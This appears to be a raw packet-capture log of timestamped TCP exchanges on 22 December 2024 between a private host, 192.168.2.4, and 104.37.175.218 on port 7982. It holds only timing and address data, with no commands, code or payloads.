                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661199093 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661551952 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661582947 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661650896 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661683083 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661746025 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661781073 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661931038 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.661977053 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662039042 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662043095 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662116051 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662122011 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662194014 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662233114 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662343025 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662411928 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.662424088 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.709192038 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781068087 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781363964 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781394958 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781680107 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781755924 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781836033 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.781867981 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782046080 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782123089 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782238007 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782330990 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782360077 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782392025 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782418966 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782535076 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782562971 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782613039 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782639980 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:25.782674074 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.211304903 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.244548082 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.244755030 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.244863033 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364090919 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364159107 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364305019 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364319086 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364357948 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364638090 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364650965 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364707947 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364722013 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.364736080 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.483829021 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.714006901 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.724288940 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.724469900 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.724559069 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.843760967 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.843991995 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.844006062 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.844036102 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.844188929 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.844209909 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:26.844243050 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:27.080122948 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:27.134571075 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.072125912 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.191606998 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.191798925 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.311258078 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.567334890 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.567461967 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.567467928 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.567498922 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.567523956 CET498027982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.686892033 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.686904907 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:28.686939955 CET798249802104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:33.572382927 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:33.692027092 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:33.692327976 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:33.697844982 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:33.817249060 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:34.857131958 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:34.857155085 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:34.857319117 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:34.866101027 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:34.987061024 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.220938921 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.221151114 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.343422890 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.573764086 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.576894999 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.696525097 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.696650028 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:35.816215038 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.046346903 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.053368092 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.173105955 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.173171997 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.292819977 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.523060083 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525520086 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525597095 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525604010 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525609016 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525666952 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525695086 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525707960 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.525763988 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.533967018 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.534040928 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.534092903 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.539921999 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.539948940 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.540026903 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.548351049 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.548371077 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.548429012 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.556663036 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.556771994 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.556833029 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.565040112 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.618920088 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.717747927 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.717782974 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.717902899 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.721453905 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.721543074 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.721606016 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.729176044 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.729321957 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.729371071 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.736794949 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:36.790797949 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:38.805006981 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:38.924715996 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:38.928030014 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.048005104 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.286745071 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.286792994 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.286993027 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.290410042 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.292144060 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.292156935 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.292216063 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.299839020 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.299876928 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.299938917 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.304838896 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.304920912 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.304924011 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.312695980 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.312740088 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.312791109 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.320194960 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.320259094 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.320278883 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.327800989 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.327878952 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.327938080 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.335550070 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.335614920 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.335621119 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.343220949 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.343338013 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.343420029 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.350889921 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.350938082 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.350956917 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.358556986 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.358613014 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.358632088 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.366204023 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.366275072 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.366323948 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.373887062 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.373961926 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.373995066 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.381633997 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.381691933 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.381697893 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.389261961 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.389343977 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.389362097 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.396919966 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.396962881 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.397002935 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.447182894 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.478636980 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.478657961 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.478862047 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.481631994 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.481690884 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.481751919 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.487694025 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.489954948 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.489972115 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.490031958 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.496006966 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.496078968 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.496082067 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.502059937 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.502118111 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.502135038 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.507924080 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.507989883 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.508047104 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.513493061 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.513566017 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.513693094 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.518826962 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.518893003 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.519021034 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.524223089 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.524285078 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.524287939 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.529382944 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.529442072 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.529578924 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.534470081 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.534528017 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.534548044 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.539511919 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.539581060 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.539604902 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.544518948 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.544560909 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.544596910 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.549535990 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.549595118 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.549607992 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.554555893 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.554632902 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.554646969 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.559586048 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.559662104 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.559681892 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.564625025 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.564699888 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.564716101 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.569634914 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.569708109 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.569716930 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.574655056 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.574738979 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.574774027 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.579734087 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.579807043 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.579808950 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.584770918 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.584851027 CET498317982192.168.2.4104.37.175.218
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.584852934 CET798249831104.37.175.218192.168.2.4
                                                                                                                                                                                                                                                                                                            Dec 22, 2024 23:57:39.589776993 CET798249831104.37.175.218192.168.2.4
